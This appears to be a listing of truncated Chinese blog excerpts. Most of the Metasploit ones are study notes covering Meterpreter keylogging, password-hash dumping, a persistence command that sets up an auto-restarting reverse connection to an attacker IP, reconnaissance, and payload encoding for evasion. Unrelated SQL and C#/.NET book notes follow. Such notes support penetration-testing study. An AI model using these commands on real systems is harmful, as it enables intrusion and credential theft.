一、基本命令 截屏 screenshot 2.获取系统平台信息 sysinfo 3.进程信息 ps 4.获取键盘记录 查看进程信息ps--migrate将会话迁移至explorer.exe进程空间中---然后-- run post/windows/capture/keylog_recorder 过一段时间CTRL+C中止。 最后在另一个终端里，可以看到我们使用键盘记录所捕捉的内容。 5.提取密码哈希 use priv运行特权账号 run post/windows/gather/hashdump…

Meterpreter的persisitence脚本允许主任meterpreter代理，以确保系统重启之后Meterpreter还能运行。如果是反弹连接方式，可以设置连接攻击机的时间间隔。如果是绑定方式，可以设置在指定时间按绑定开放端口。 举例：run persistence -X -i 50 -p 442 -r 192.168.33.129 此脚本让系统开机自启动(-X),50秒（-i 50）重连一次，使用的端口是443（-p 443）,连接的目的IP为192.168.33.129. use…

一、渗透攻击基础 1.常用命令 show exploits 显示Meta框架中所有可用的渗透攻击模块。 show options 显示模块所需要的各种参数 back 返回Meta的上一个状态 search 查找模块 use 使用模块 show payloads 输入此命令时，Meta只会将与当前模块兼容的攻击载荷显示出来； set payload 选择需要的payload show targets 列出受到漏洞影响目标系统的类型 注意：Auto Targeting 攻击模块通过目标系统的指纹信息…

三、信息收集 被动信息收集 在不接触目标系统时进行的信息收集，包括使用工具Yeti、Whois （1）Whois msf > whois secmaniac.net （2）Netcraft：find the IP address of a server hosting a particular website （3）nslookup 2.主动信息收集：与目标系统主动交互 （1）使用nmap进行端口扫描 推荐选项-sS，执行一次隐秘的TCP扫描 推荐选项-Pn，告诉nmap不要使用ping命令判断…

The msfpayload component of Metasploit allows you to generate shellcode, executables, and much more for use in exploits outside of the Framework。msfpayload -h Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade…

本系列记录并分享学习SQL的过程,主要内容为SQL的基础概念及练习过程. 书目信息 中文名:<SQL必知必会(第4版)> 英文名:<Sams Teach Yourself SQL in 10 Minutes - Fourth Edition> 读书笔记汇总 建立练习环境 以CentOS7系统下的MySQL和MariaDB为例. 01--了解SQL 什么是SQL,为什么很有用 基本的数据库术语 02--检索数据 如何使用SQL的SELECT语句来检索单个表列.多个表列以及所有表列 如…

读书笔记--SQL必知必会18--视图 18.1 视图 视图是虚拟的表,只包含使用时动态检索数据的查询. 也就是说作为视图,它不包含任何列和数据,包含的是一个查询. 18.1.1 为什么使用视图 重用SQL语句 简化复杂的SQL操作 使用表的一部分而不是整个表 保护数据:可以赋予访问表的特定部分的权限 可返回与底层表不同格式和表示的数据 如果应用大量或复杂的视图,极可能影响性能,应该先进行测试再应用视图. 18.1.2 视图的规则和限制 视图名必须唯一,与其他的视图和表不同 视图数目没有限制 可…

.NET Framework 4.0 看(本质论第3版) .NET Framework 4.5 看(本质论第4版) .NET 4.0为多线程引入了两组新API:TPL(Task Parallel Library,任务并行库)和PLINQ(Parallel LINQ,并行LINQ). 18.1 独立线程的运行和控制 通过 System.Threading.Tasks.Task 类在托管代码中公开各种API,该类代表的是一个异步操作.然而,一个 Task 并不直接映射到一个非托管线程.相反, Tas…

一.此书到底何方神圣? 本书是广受赞誉C#图解教程的最新版本.作者在本书中创造了一种全新的可视化叙述方式,以图文并茂的形式.朴实简洁的文字,并辅之以大量表格和代码示例,全面.直观地阐述了C#语言的各种特性.新版本除了精心修订旧版内容外,还全面涵盖了C# 5.0的新增特性,比如异步编程.调用者信息.case表达式.带参数的泛型构造函数.支持null类型运算等.通过本书,读者能够快速.深入地理解C#,为自己的编程生涯打下良好的基础. 本书是C#入门的经典好书,适合对C#感兴趣的所有读者.Daniel…

一.此书到底何方神圣? <你必须知道的.NET>来自于微软MVP—王涛(网名:AnyTao,博客园大牛之一,其博客地址为:http://anytao.cnblogs.com/)的最新技术心得和感悟,将技术问题以生动易懂的语言展开,层层深入,以例说理.全书主要,包括了.NET基础知识及其深度分析,以.NET Framework和CLR研究为核心展开.NET本质论述,涵盖了.NET基本知识几乎所有的重点内容.全书分为5个部分,第1部分讲述.NET与面向对象,从底层实现角度分析了.NET如何实现面向…